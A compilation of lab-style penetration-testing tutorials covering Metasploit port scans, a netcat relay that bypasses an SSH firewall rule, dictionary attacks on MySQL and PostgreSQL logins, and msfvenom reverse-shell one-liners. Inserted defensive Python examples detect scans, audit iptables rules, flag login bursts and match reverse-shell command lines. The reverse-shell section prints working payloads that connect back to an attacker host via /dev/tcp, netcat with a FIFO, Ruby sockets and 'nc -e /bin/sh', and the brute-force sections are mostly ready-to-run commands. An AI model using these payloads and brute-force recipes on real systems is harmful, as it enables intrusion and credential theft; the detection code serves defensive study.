As specified in the commands below, this module sends an ACK packet to ports 21, 22, 80 and 443 to enumerate the firewall's state for these ports. If it receives a RST packet as a reply from the destination port, it reports that port as unfiltered; if it receives no RST, it reports nothing for that port, which means the port is protected by a firewall.

use auxiliary/scanner/portscan/ack

msf auxiliary(ack) > set rhosts 192.168.1.105

msf auxiliary(ack) > set ports 21,22,80,443

msf auxiliary(ack) > exploit

In the image below you can see that it shows TCP unfiltered for ports 21, 22 and 443 and nothing for port 80, hence port 80 is filtered. This scan can only be used to identify the firewall state in terms of filtered or unfiltered ports.

We used Wireshark to demonstrate the ACK scan; here you can see that port 80 does not reply with a RST packet, which means the ACK packet to port 80 was blocked by the network administrator.

SYN Scan

This module enumerates open TCP services using a raw SYN scan. Here a SYN packet is sent to ports 21, 22, 80 and 443 to enumerate their open/closed state. If it receives a SYN/ACK packet as a reply from the destination port, it reports that port as OPEN; if it receives no SYN/ACK, it reports nothing for that port, which indicates a filtered or closed state.

use auxiliary/scanner/portscan/syn

msf auxiliary(syn) > set rhosts 192.168.1.105

msf auxiliary(syn) > set ports 21,22,80,443

msf auxiliary(syn) > exploit

In the image below you can see that it shows TCP OPEN for ports 21, 80 and 443 and nothing for port 22, hence port 22 is filtered or closed.

Again we used Wireshark to demonstrate the SYN scan; here you can see that port 22 does not reply with SYN/ACK, which means the SYN packet to port 22 was blocked by the network administrator.

You can also observe the following packet exchange between the source and destination ports:

  • Source port sends SYN packet to destination port
  • Source port receives SYN, ACK packet from destination port
  • Source port sends RST packet to destination port

TCP Scan

This module enumerates open TCP services by performing a full TCP connect on each port. It does not need administrative privileges on the source machine, which can be useful when pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set rhosts 192.168.1.105

msf auxiliary(tcp) > set ports 21,22,80,443

msf auxiliary(tcp) > exploit

This scan is similar to the SYN scan; the difference is that it completes the full TCP exchange (a 4-way handshake) whereas the SYN scan performs only a half-open TCP connection.

In the image below you can see that it shows TCP OPEN for ports 21, 80 and 443 and nothing for port 22, hence port 22 is filtered or closed.

Here you can see that port 22 does not reply with SYN/ACK, which means the SYN packet to port 22 was blocked by the network administrator.

You can also observe the following packet exchange between the source and destination ports:

  • Source port sends SYN packet to destination port
  • Source port receives SYN, ACK packet from destination port
  • Source port sends ACK packet to destination port
  • Source port sends FIN, ACK packet to destination port

XMAS Scan

This module enumerates open|filtered TCP services using a raw "XMas" scan, which sends probes with the FIN, PSH and URG flags set.

Instead of the TCP 3-way handshake, this scan uses other TCP flags to enumerate the state of the ports.

use auxiliary/scanner/portscan/xmas

msf auxiliary(xmas) > set rhosts 192.168.1.105

msf auxiliary(xmas) > set ports 21,22,80,443

msf auxiliary(xmas) > exploit

In the image below you can see that this time it shows TCP OPEN|FILTERED for all the ports, i.e. 21, 22, 80 and 443.

In the image below, the source port sends FIN, PSH and URG packets to the destination and the destination port does not send any reply, which indicates the specified ports are open (reported as open|filtered); if a destination port replies with RST/ACK, that port is closed.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, social media lover and gadget enthusiast. Contact here.
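Each of the four scans above has a flag signature a firewall can log before it drops: a bare SYN to many ports, a bare ACK that belongs to no connection, or the FIN+PSH+URG combination of the XMAS probe. The Python below is an added example, not the article's code: it parses the key=value fields and bare flag tokens of an iptables LOG line, classifies each probe, and reports any source that sends the same probe type to several distinct ports on one destination. It assumes the DROP rules above are preceded by a `-j LOG --log-prefix "PROBE: "` rule; the log lines are constructed with that prefix and the article's addresses (192.168.1.103 scanning 192.168.1.105), with a made-up MAC and timestamp.

```python
"""Classify port-scan probe types from iptables LOG lines.

Added example (not from the original article). The kernel's LOG target
writes key=value fields (SRC= DST= PROTO= DPT= ...) and the set TCP flags
as bare tokens (SYN ACK FIN RST PSH URG ...). Sample lines are constructed.
"""
from collections import defaultdict

FLAG_TOKENS = {"SYN", "ACK", "FIN", "RST", "PSH", "URG", "CWR", "ECE"}

def parse_log_line(line):
    """Return {src, dst, dpt, flags} for a TCP LOG line, or None otherwise."""
    fields, flags = {}, set()
    for tok in line.split():
        if "=" in tok:
            k, _, v = tok.partition("=")
            fields[k] = v
        elif tok in FLAG_TOKENS:
            flags.add(tok)
    if fields.get("PROTO") != "TCP" or "DPT" not in fields:
        return None
    return {"src": fields["SRC"], "dst": fields["DST"],
            "dpt": int(fields["DPT"]), "flags": flags}

def probe_type(flags):
    """Map a flag set to the scan that produces it, or None for normal traffic."""
    if flags == {"SYN"}:
        return "syn"                      # SYN or connect scan
    if flags == {"ACK"}:
        return "ack"                      # ACK scan (firewall mapping)
    if flags == {"FIN", "PSH", "URG"}:
        return "xmas"
    if not flags:
        return "null"
    return None

def detect_scans(lines, min_ports=3):
    """Return {(src, dst, probe_type): sorted ports} where >= min_ports were hit."""
    hits = defaultdict(set)
    for line in lines:
        pkt = parse_log_line(line)
        if pkt is None:
            continue
        kind = probe_type(pkt["flags"])
        if kind is not None:
            hits[(pkt["src"], pkt["dst"], kind)].add(pkt["dpt"])
    return {k: sorted(v) for k, v in hits.items() if len(v) >= min_ports}

def _log_line(src, dst, dpt, flags):
    """Build a constructed LOG line in the kernel's field layout (MAC/time made up)."""
    return (f"Jan  1 10:00:00 ubuntu kernel: [ 120.000000] PROBE: IN=eth0 OUT= "
            f"MAC=08:00:27:aa:bb:cc:08:00:27:dd:ee:ff:08:00 SRC={src} DST={dst} "
            f"LEN=44 TOS=0x00 PREC=0x00 TTL=64 ID=1 PROTO=TCP SPT=40000 DPT={dpt} "
            f"WINDOW=1024 RES=0x00 {' '.join(flags)} URGP=0")

SCANNER, TARGET, PORTS = "192.168.1.103", "192.168.1.105", (21, 22, 80, 443)
SAMPLE_LOG = (
    [_log_line(SCANNER, TARGET, p, ["ACK"]) for p in PORTS]                 # ACK scan
    + [_log_line(SCANNER, TARGET, p, ["FIN", "PSH", "URG"]) for p in PORTS]  # XMAS scan
    + [_log_line(SCANNER, TARGET, p, ["SYN"]) for p in PORTS]                # SYN scan
    + [_log_line("192.168.1.50", TARGET, 80, ["ACK"])]                       # lone stray ACK
)

if __name__ == "__main__":
    for (src, dst, kind), ports in detect_scans(SAMPLE_LOG).items():
        print(f"{kind:4s} scan from {src} against {dst}: ports {ports}")
```

The ACK classification is only meaningful if the LOG rule is restricted to packets that belong to no existing connection (for example with `-m conntrack --ctstate INVALID` ahead of it), because every established flow carries ACK-only segments; the SYN and XMAS signatures do not have that ambiguity.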

The post Port Scanning using Metasploit with IPTables appeared first on Hacking Articles.

Bypass SSH Restriction by Port Relay


Today we are going to access an SSH port that is blocked by the firewall by forwarding it through another port with a port relay tool. A netcat relay is a handy way to connect to a remote system while evading the firewall restriction.

Attacker: Kali Linux (IP: 192.168.1.2)

Victim: Ubuntu Server (IP: 192.168.1.7)

Connect to SSH via port 22

Let's first try to get a normal SSH shell. As you can see in the screenshot, we successfully get an SSH shell on port 22 of the server 192.168.1.7.

Command: ssh pavan@192.168.1.7

Block Port 22 for Incoming TCP Packet

Now let's block the SSH service port 22 for incoming TCP packets using iptables. Here we create an inbound rule that drops TCP packets to port 22 if the packet source is Kali (192.168.1.2).

Command: iptables -A INPUT -s 192.168.1.2 -p tcp --dport 22 -j DROP

After blocking the port, let's try to get a shell again. From the image below you can observe that we get a connection timed out error, because the packets are dropped by the firewall.

Allow TCP Packets on another port

Now let's add a firewall rule that accepts TCP packets on port 4444 if the packet source is Kali (192.168.1.2).

Command: iptables -I INPUT 1 -s 192.168.1.2 -p tcp --dport 4444 -j ACCEPT

Check Netcat communication between Attacker and Client

Let's check whether Kali (192.168.1.2) can reach a netcat listener on port 4444 of the server.

Command: nc -v -l -p 4444

Command: nc 192.168.1.7 4444

As you can see in the image, Kali (192.168.1.2) has a netcat session to port 4444 on the SSH server.

Use Netcat Relay backpipe to access SSH service

Now we will build the relay. But first, let's understand what the commands shown below do.

The first command creates a special type of file called a FIFO, or named pipe. We call it backpipe because it is going to carry our responses back through the relay.

The second command starts a netcat listener on the port the firewall allows. This listener takes its standard input (0<) from the backpipe. Its standard output is piped into a netcat client that connects to localhost (127.0.0.1) on TCP port 22, where sshd listens, and that client's standard output (1>) is written back into the backpipe. We need both the forward pipe and the backpipe because netcat needs two-way communication.

Command: mknod /tmp/backpipe p

[p]: Tells mknod to create a FIFO

Command: nc -l -p 4444 0</tmp/backpipe | nc localhost 22 1>/tmp/backpipe

[-l]: Listen

[-p]: Port

Access SSH through Netcat Relay

Now let's try to make the SSH connection through port 4444.

Command: ssh pavan@192.168.1.7 -p 4444

[-p]: Specifies the port
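The two iptables rules above leave the chain's default policy at ACCEPT, which is what makes the relay possible: port 22 is dropped for 192.168.1.2, but every other port on the same host is still reachable from it. The following added example (not part of the original post) simulates first-match evaluation of an INPUT chain written in the syntax that `iptables -S INPUT` prints, so the gap can be checked offline; the rule text and the default-deny counterpart are constructed, and the simulator only understands -s, -p, --dport, --ctstate and -j (other options are skipped).

```python
"""Audit an iptables INPUT rule set for the gap the relay above goes
through: a source is dropped on port 22 but still accepted elsewhere.
Added example; rule text is constructed in `iptables -S INPUT` syntax."""
import ipaddress
import shlex

# The article's two rules, as `iptables -S INPUT` would print them
ARTICLE_RULES = """\
-P INPUT ACCEPT
-A INPUT -s 192.168.1.2/32 -p tcp -m tcp --dport 4444 -j ACCEPT
-A INPUT -s 192.168.1.2/32 -p tcp -m tcp --dport 22 -j DROP
"""

# Default-deny version (constructed): only replies to existing connections
# and SSH from an assumed admin network 10.0.0.0/24 are accepted.
DEFAULT_DENY_RULES = """\
-P INPUT DROP
-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A INPUT -s 10.0.0.0/24 -p tcp -m tcp --dport 22 -j ACCEPT
"""

# Options the simulator understands; each takes exactly one argument
KNOWN = {"-s": "src", "-d": "dst", "-p": "proto", "--dport": "dport",
         "-j": "target", "--ctstate": "ctstate"}


def parse_rules(text):
    """Return (default_policy, rules) for the INPUT chain."""
    policy, rules = "ACCEPT", []
    for line in text.splitlines():
        toks = shlex.split(line)
        if not toks:
            continue
        if toks[0] == "-P":                 # "-P INPUT ACCEPT|DROP"
            policy = toks[2]
            continue
        rule, i = {}, 2                     # skip "-A INPUT"
        while i < len(toks):
            tok = toks[i]
            if tok in KNOWN:
                rule[KNOWN[tok]] = toks[i + 1]
                i += 2
            elif tok.startswith("-") and i + 1 < len(toks) and not toks[i + 1].startswith("-"):
                i += 2                      # unknown option with argument, e.g. "-m tcp"
            else:
                i += 1
        rules.append(rule)
    return policy, rules


def matches(rule, src, dport):
    """Does this rule match a NEW TCP connection from src to dport?"""
    if "src" in rule and ipaddress.ip_address(src) not in ipaddress.ip_network(rule["src"], strict=False):
        return False
    if rule.get("proto", "tcp") != "tcp":
        return False
    if "dport" in rule and int(rule["dport"]) != dport:
        return False
    # a conntrack rule only matches a fresh SYN if it lists NEW
    if "ctstate" in rule and "NEW" not in rule["ctstate"].split(","):
        return False
    return True


def verdict(text, src, dport):
    """First matching rule wins; otherwise the chain policy applies."""
    policy, rules = parse_rules(text)
    for rule in rules:
        if matches(rule, src, dport):
            return rule["target"]
    return policy


def reachable_ports(text, src, ports):
    """Ports the given source can open new TCP connections to."""
    return [p for p in ports if verdict(text, src, p) == "ACCEPT"]


if __name__ == "__main__":
    print("article rules:", reachable_ports(ARTICLE_RULES, "192.168.1.2", [22, 4444, 8080]))
    print("default deny:", reachable_ports(DEFAULT_DENY_RULES, "192.168.1.2", [22, 4444, 8080]))
```

Run against the article's rules, 192.168.1.2 is still accepted on 4444 and on every port that no rule mentions, which is exactly the path the relay uses; with a DROP policy and an explicit allow list, the same host reaches nothing, and a port-22 DROP rule becomes unnecessary.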

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here


5 Ways to Hack MySQL Login Password


In this article, we will learn how to gain control over our victim's PC through the MySQL service on port 3306. There are various ways to do it, so let's take the time to learn all of them, because different circumstances call for different measures.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC, to name a few.

Run the following command

medusa -h 192.168.1.106 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M mysql

Here

-U: denotes the path of the username list

-P: denotes the path of the password list

As you can observe, we have successfully grabbed the MySQL username root and password toor.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106:3306

Here

-U: denotes the path of the username list

-P: denotes the path of the password list

As you can observe, we have successfully grabbed the MySQL username root and password toor.

xHydra

This is the graphical version of Hydra, used here to run a dictionary attack against port 3306. For this method to work:

Open xHydra in Kali. Select the Single Target option and enter the IP of your victim PC. Select MySQL in the Protocol box and enter the port number 3306 in the Port box.

Now go to the Passwords tab, select Username List and enter the path of the text file that contains the usernames in the box next to it.

Then select Password List and enter the path of the text file that contains all the passwords in the box next to it.

After doing this, go to the Start tab and click the Start button on the left.

Now the dictionary attack will start, and you will obtain the username and password of your victim.

Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.106 mysql

-L: denotes the path of the username list

-P: denotes the path of the password list

Once the command is executed it starts the dictionary attack, and you will have the right username and password in no time. As you can observe, we have successfully grabbed the MySQL username root and password toor.

Metasploit

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.106

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > set stop_on_success true

msf auxiliary(mysql_login) > run

This starts the brute-force attack and tries the combinations from the username and password files until a valid username and password match.

From the image you can observe that our MySQL server is not secure against brute-force attack, because it shows the matching combination of username root and password toor.

Once the attacker retrieves valid credentials he can log in to the MySQL server directly to steal or destroy the database.

Author: Rahul Virmani is a Certified Ethical Hacker and a researcher in the field of network Penetration Testing (CYBER SECURITY). Contact Here


6 Ways to Hack PostgreSQL Login


In this article, we will learn how to gain control over our victim's PC through port 5432, used by the PostgreSQL service. There are various ways to do it, so let's take the time to learn all of them, because different circumstances call for different measures.

Let's start!!

 Hydra

Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, postgres, http, https, smb, several databases, and much more.

Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.

Run the following command

hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.120 postgres

-L: denotes path for username list

-P:  denotes path for password list

Once the command is executed it starts the dictionary attack, and you will have the right username and password in no time. As you can observe, we have successfully grabbed the PostgreSQL username postgres and password postgres.

xHydra

This is the graphical version of Hydra, used here to run a dictionary attack against port 5432. For this method to work:

Open xHydra in Kali. Select the Single Target option and enter the IP of your victim PC. Select postgres in the Protocol box and enter the port number 5432 in the Port box.

Now go to the Passwords tab, select Username List and enter the path of the text file that contains the usernames in the box next to it.

Then select Password List and enter the path of the text file that contains all the passwords in the box next to it.

After doing this, go to the Start tab and click the Start button on the left.

Now the dictionary attack will start, and you will obtain the username and password of your victim.

Medusa

Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, POSTGRES, HTTP, IMAP, rlogin, SSH, Subversion, and VNC, to name a few.

Run the following command

medusa -h 192.168.1.120 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M postgres

Here

-U: denotes the path of the username list

-P: denotes the path of the password list

As you can observe, we have successfully grabbed the PostgreSQL username postgres and password postgres.

Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. 

Run the following command

ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.120:5432

Here

-U: denotes the path of the username list

-P: denotes the path of the password list

As you can observe, we have successfully grabbed the PostgreSQL username postgres and password postgres.

Patator

Patator is a multi-purpose brute-forcer with a modular design and flexible usage. It is useful for brute-force attacks against several services such as PostgreSQL, HTTP and SMB.

patator pgsql_login host=192.168.1.120 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt

From the image below you can observe that the dictionary attack starts, and thus you obtain the username and password of your victim.

Metasploit

This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. Note that passwords may be either plaintext or MD5 formatted hashes.

Open a Kali terminal and type msfconsole

Now type use auxiliary/scanner/postgres/postgres_login

msf auxiliary(scanner/postgres/postgres_login) > set rhosts 192.168.1.120 (IP of the remote host)

msf auxiliary(scanner/postgres/postgres_login) > set user_file /root/Desktop/user.txt

msf auxiliary(scanner/postgres/postgres_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(scanner/postgres/postgres_login) > set stop_on_success true

msf auxiliary(scanner/postgres/postgres_login) > exploit

From the image below you can observe that we have successfully grabbed the PostgreSQL username and password.
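From the server side, both the MySQL dictionary attack in the previous article and the PostgreSQL one here leave the same trace: a burst of authentication failures from one client address against a handful of usernames. The following added example (not part of either article) pulls those failures out of constructed MySQL error-log and PostgreSQL log lines and reports any source that reaches a threshold inside a sliding window. Assumptions: MySQL is writing its 'Access denied' entries (log_error_verbosity=3 on 8.0, log_warnings>1 on 5.7), PostgreSQL's log_line_prefix includes %h so the client host appears on the line, and both logs are in UTC; the client address 192.168.1.50 is constructed.

```python
"""Detect password-guessing bursts in MySQL and PostgreSQL logs.
Added example; all log lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_LOG = """\
2019-03-04T10:15:30.000001Z 12 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2019-03-04T10:15:30.200001Z 13 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2019-03-04T10:15:30.400001Z 14 [Note] Access denied for user 'root'@'192.168.1.50' (using password: YES)
2019-03-04T10:15:30.600001Z 15 [Note] Access denied for user 'admin'@'192.168.1.50' (using password: YES)
2019-03-04T10:15:30.800001Z 16 [Note] Access denied for user 'admin'@'192.168.1.50' (using password: NO)
2019-03-04T10:15:31.000001Z 17 [Note] Access denied for user 'admin'@'192.168.1.50' (using password: YES)
2019-03-04T10:20:00.000001Z 18 [Note] Access denied for user 'app'@'10.0.0.9' (using password: YES)
2019-03-04 10:16:00.100 UTC [2201] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2019-03-04 10:16:00.300 UTC [2202] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2019-03-04 10:16:00.500 UTC [2203] 192.168.1.50 FATAL:  password authentication failed for user "postgres"
2019-03-04 10:16:00.700 UTC [2204] 192.168.1.50 FATAL:  password authentication failed for user "admin"
2019-03-04 10:16:00.900 UTC [2205] 192.168.1.50 FATAL:  password authentication failed for user "admin"
"""

# MySQL 5.7/8.0 error log: "<ts>Z <thread> [..] Access denied for user 'u'@'host'"
MYSQL_RE = re.compile(
    r"^(?P<ts>\S+Z) \d+ .*Access denied for user '(?P<user>[^']*)'@'(?P<src>[^']+)'")
# PostgreSQL with log_line_prefix '%m [%p] %h ' (assumed)
PG_RE = re.compile(
    r'^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) \w+ \[\d+\] (?P<src>\S+) '
    r'FATAL:\s+password authentication failed for user "(?P<user>[^"]+)"')


def parse_failures(lines):
    """Return (timestamp, service, user, src) for every failed login line."""
    events = []
    for line in lines:
        m = MYSQL_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ")
            events.append((ts, "mysql", m["user"], m["src"]))
            continue
        m = PG_RE.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, "postgresql", m["user"], m["src"]))
    return events


def detect_bursts(events, threshold=5, window=timedelta(seconds=60)):
    """{(service, src): (max failures inside one window, sorted users tried)}
    for every source whose failure count reaches the threshold."""
    by_key = defaultdict(list)
    for ts, service, user, src in events:
        by_key[(service, src)].append((ts, user))
    alerts = {}
    for key, items in by_key.items():
        items.sort()
        best, start = 0, 0
        for end in range(len(items)):          # sliding window over sorted times
            while items[end][0] - items[start][0] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            alerts[key] = (best, sorted({u for _, u in items}))
    return alerts


if __name__ == "__main__":
    for key, (count, users) in detect_bursts(parse_failures(SAMPLE_LOG.splitlines())).items():
        print(f"{key[0]}: {count} failures from {key[1]} against {users}")
```

The threshold and window are the tuning knobs: the tools in these articles try many passwords per second, so even a low threshold over a one-minute window separates them cleanly from the single mistyped password at 10:20 from 10.0.0.9, which stays below it.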

Author: Rahul Virmani is a Certified Ethical Hacker and a researcher in the field of network Penetration Testing (CYBER SECURITY). Contact Here


Spawn TTY Shell using Msfvenom (One Liner Payload)


Hello friends!! Today you will learn how to spawn a TTY reverse shell through netcat using a single-line payload, also known as a stager, that comes with Metasploit.

Basically there are two types of terminal, TTYs and PTYs. A TTY is a Linux/Unix hardwired terminal on a serial connection with a keyboard attached; a PTY (pseudo-TTY) is a software copy of a terminal used for network connections such as SSH or telnet.

Let’s start!!

Attacker: Kali Linux

Target: Ubuntu

Open a terminal in Kali Linux and type msfconsole to load the Metasploit framework, then search all one-liner payloads for UNIX systems with the search command given below; it lists every payload that can be used to compromise a UNIX system.

search cmd/unix

From the image below you can observe that it has listed all payloads that can be used to compromise a UNIX system. In this tutorial we are going to use some of these payloads to spawn a TTY shell.

Bash Shell

To get a bash reverse shell you can use the reverse_bash payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_bash lhost=192.168.1.103 lport=1111 R

Here we entered the following details to generate the one-liner raw payload:

-p: the payload to use, i.e. cmd/unix/reverse_bash

lhost: the listening IP address, i.e. the Kali Linux IP

lport: the listening port number, i.e. 1111 (any port not used by another service)

R: raw output format

As shown in the image below, the generated payload is 67 bytes. Now copy this code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.

For example, when the target runs the code (0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121) in a terminal, the attacker gets a reverse shell through netcat.

nc -lvp 1111

As you can observe from the image below, the attacker has obtained a TTY shell on the target system and can now do whatever he wishes.

For example:

whoami: tells you that you are the root user of the system you have compromised.

Netcat Shell

To get a netcat reverse shell you can use the reverse_netcat payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.103 lport=2222 R

Here we entered the following details to generate the one-liner raw payload:

-p: the payload to use, i.e. cmd/unix/reverse_netcat

lhost: the listening IP address, i.e. the Kali Linux IP

lport: the listening port number, i.e. 2222 (any port not used by another service)

R: raw output format

As shown in the image below, the generated payload is 104 bytes. Now copy this code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.

When the target runs the code (mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admoszx | /bin/sh >/tmp/admoszx 2>&1; rm /tmp/admoszx) in a terminal, the attacker gets a reverse shell through netcat.

nc -lvp 2222

As you can observe from the image below, the attacker has obtained a TTY shell on the target system.

Perl shell

To get a perl reverse shell you can use the reverse_perl payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_perl lhost=192.168.1.103 lport=3333 R

Here we entered the following details to generate the one-liner raw payload:

-p: the payload to use, i.e. cmd/unix/reverse_perl

lhost: the listening IP address, i.e. the Kali Linux IP

lport: the listening port number, i.e. 3333 (any port not used by another service)

R: raw output format

As shown in the image below, the generated payload is 232 bytes. Now copy this code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.

Again, when the target runs the code in a terminal, the attacker gets a reverse shell through netcat.

nc -lvp 3333

As you can observe from the image below, the attacker has obtained a TTY shell on the target system. Here we found the target IP address 192.168.1.1106 by running ifconfig in the TTY shell.

Python Shell

To get a python reverse shell you can use the reverse_python payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_python lhost=192.168.1.103 lport=4444 R

Here we entered the following details to generate the one-liner raw payload:

-p: the payload to use, i.e. cmd/unix/reverse_python

lhost: the listening IP address, i.e. the Kali Linux IP

lport: the listening port number, i.e. 4444 (any port not used by another service)

R: raw output format

As shown in the image below, the generated payload is 533 bytes. Now copy this code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.

Again, when the target runs the code in a terminal, the attacker gets a reverse shell through netcat.

nc -lvp 4444

As you can observe from the image below, the attacker has obtained a TTY shell on the target system and can now do whatever he wishes.

For example:

ifconfig: shows the IP configuration of the system you have compromised.

Ruby Shell

To get a ruby reverse shell you can use the reverse_ruby payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_ruby lhost=192.168.1.103 lport=5555 R

Here we entered the following details to generate the one-liner raw payload:

-p: the payload to use, i.e. cmd/unix/reverse_ruby

lhost: the listening IP address, i.e. the Kali Linux IP

lport: the listening port number, i.e. 5555 (any port not used by another service)

R: raw output format

As shown in the image below, the generated payload is 131 bytes. Now copy this code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.

Again, when the target runs the code (ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.103","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end') in a terminal, the attacker gets a reverse shell through netcat.

nc -lvp 5555

As you can observe from the image below, the attacker has obtained a TTY shell on the target system and can now do whatever he wishes.

For example:

ifconfig: shows the IP configuration of the system you have compromised.

/bin/sh shell

To get a plain command shell you can use the reverse_netcat_gaping payload with msfvenom as given in the command below.

msfvenom -p cmd/unix/reverse_netcat_gaping lhost=192.168.1.103 lport=6666 R

Here we entered the following details to generate the one-liner raw payload:

-p: the payload to use, i.e. cmd/unix/reverse_netcat_gaping

lhost: the listening IP address, i.e. the Kali Linux IP

lport: the listening port number, i.e. 6666 (any port not used by another service)

R: raw output format

As shown in the image below, the generated payload is 533 bytes. Now copy this code and send it to the target, then start netcat to receive the reverse connection and wait for the TTY shell.

To reach the target's /bin/sh for a TTY shell, we first accessed a PTY terminal on the target through SSH and then pasted the code (nc 192.168.1.103 6666 -e /bin/sh) into that PTY terminal.

nc -lvp 6666

From the image below you can observe that we have successfully accessed a TTY shell on the target system.
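Every payload in this post reaches the target as a shell command line, which is where a defender can catch it: shell history, auditd EXECVE records or an EDR's process-creation events. The following added example (not part of the original post) is a small set of indicators for those one-liners, exercised against the payload strings shown above and against constructed benign commands that must not fire. The patterns are heuristics written for this example, not a published rule set, and a real deployment would run them over the command-line field of each process event.

```python
"""Flag reverse-shell one-liners in command lines.
Added example; the benign sample commands are constructed."""
import re

# (indicator name, pattern). re.S lets ".*" span the whole command line.
INDICATORS = [
    # bash: redirection through /dev/tcp/<host>/<port>
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/[\w.:-]+/\d+")),
    # netcat with a named pipe feeding /bin/sh (the reverse_netcat form)
    ("netcat_fifo_relay", re.compile(r"mkfifo\s+\S+.*\b(nc|ncat|netcat)\b.*\|\s*/bin/(ba)?sh", re.S)),
    # nc -e /bin/sh or ncat -c /bin/sh (the reverse_netcat_gaping form)
    ("netcat_exec", re.compile(r"\b(nc|ncat|netcat)\b[^|;]*\s-[a-z]*[ec]\s*/bin/(ba)?sh")),
    # ruby with the socket library and a TCPSocket in a -e script
    ("ruby_tcpsocket", re.compile(r"\bruby\b.*-rsocket.*TCPSocket", re.S)),
    # perl opening a socket and handing it to exec/system or the std handles
    ("perl_socket", re.compile(r"\bperl\b.*(IO::Socket|\bsocket\s*\().*(\bexec\b|\bsystem\b|fdopen)", re.S)),
    # python connecting a socket and spawning a shell or duplicating fds
    ("python_socket_shell", re.compile(r"\bpython[23]?\b.*socket.*(subprocess|pty\.spawn|os\.dup2)", re.S)),
    # python -c "exec(base64...)" stager wrapper
    ("python_b64_exec", re.compile(r"\bpython[23]?\b.*exec\(.*b64decode", re.S)),
]

SAMPLE_COMMANDS = [
    # payload strings shown in this post
    "0<&121-;exec 121<>/dev/tcp/192.168.1.103/1111;sh <&121 >&121 2>&121",
    "mkfifo /tmp/admoszx; nc 192.168.1.103 2222 0</tmp/admoszx | /bin/sh >/tmp/admoszx 2>&1; rm /tmp/admoszx",
    "ruby -rsocket -e 'exit if fork;c=TCPSocket.new(\"192.168.1.103\",\"5555\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'",
    "nc 192.168.1.103 6666 -e /bin/sh",
    # constructed benign commands that must not match
    "ssh pavan@192.168.1.7",
    "nc -zv 192.168.1.7 80",
    "python3 -c 'import socket; print(socket.gethostname())'",
    "ruby -e 'puts 1+1'",
]


def indicators_for(cmdline):
    """Names of every indicator that matches one command line."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]


def scan_commands(cmdlines):
    """Return (command, [indicator names]) for each command that hits."""
    hits = []
    for cmd in cmdlines:
        found = indicators_for(cmd)
        if found:
            hits.append((cmd, found))
    return hits


if __name__ == "__main__":
    for cmd, found in scan_commands(SAMPLE_COMMANDS):
        print(found, cmd[:60])
```

The netcat port-check (`nc -zv`) and the one-line Python that merely imports socket are the cases that matter for precision: the nc rule insists on a `-e`/`-c` option naming a shell, and the Python rule needs both a socket and something that spawns a process or duplicates file descriptors.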

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here

6 Ways to Hack VNC Login Password


